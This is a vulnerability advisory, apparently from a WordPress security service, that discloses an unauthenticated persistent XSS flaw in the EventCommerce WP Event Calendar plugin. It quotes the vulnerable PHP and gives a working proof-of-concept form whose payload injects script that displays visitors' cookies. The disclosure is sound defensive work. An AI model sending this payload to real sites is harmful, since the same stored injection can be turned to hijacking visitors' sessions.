03 Oct

Persistent Cross-Site Scripting (XSS) Vulnerability in EventCommerce WP Event Calendar

One of the things we do to make sure we are providing our customers with the best data on the vulnerabilities that exist and are being exploited in WordPress plugins is to monitor our websites for hacking attempts. Through that we have found a quite a few vulnerabilities that exist in the current versions of plugins that it looks like hackers have already started exploiting. In the most recent case though we are still not quite sure what the hacker was targeting. Recently we found a hacker probing for usage of the plugin EventCommerce WP Event Calendar, along with five other plugins at the same time. As we started looking over the plugins, one connection we found was that they all contained code that looked susceptible to SQL injections. For this plugin we then noticed another security vulnerability, a persistent cross-site scripting (XSS) vulnerability, that looks to be easier to exploit and that type of vulnerability is more often targeted (though usually with plugin with a lot more active installations than this one).

In the file /evntgen-scbooking.php the function evntgen_save_cssfixfront() is made accessible to those not logged in through WordPress’ AJAX functionality:

1227
add_action( 'wp_ajax_nopriv_evntgen_save_cssfixfront','evntgen_save_cssfixfront' );

That function takes user input and stores it to be shown on Calendar pages generated by the plugin:

1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
function evntgen_save_cssfixfront(){
  if ( count($_POST) > 0 ){ 
    global $table_prefix,$wpdb;
    $cssfix = $_REQUEST['cssfix'];
    $css = $_REQUEST['css'];
    $isupdate ="";
    if($cssfix == "front"){
      $isupdate = update_option('cssfix_front',$css);
    }
    if($isupdate){
      echo "added";
    }
  }
  exit;
}

The is no sanitization done when it is being stored and no escaping when it is being output in the file /operations/get_cssfixfront.php:

$cssfix_front = get_option('cssfix_front');
$output .= '<style type="text/css">
 '.$cssfix_front.'
 </style>';

Proof of Concept

The following proof of concept will cause the contents of any accessible cookies to be shown in an alert box on the pages containing the shortcode “[evntgen_sccalendar]”.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="evntgen_save_cssfixfront" />
<input type="hidden" name="cssfix" value="front" />
<input type="hidden" name="css" value="</style><script>alert(document.cookie);</script><style>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/3/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *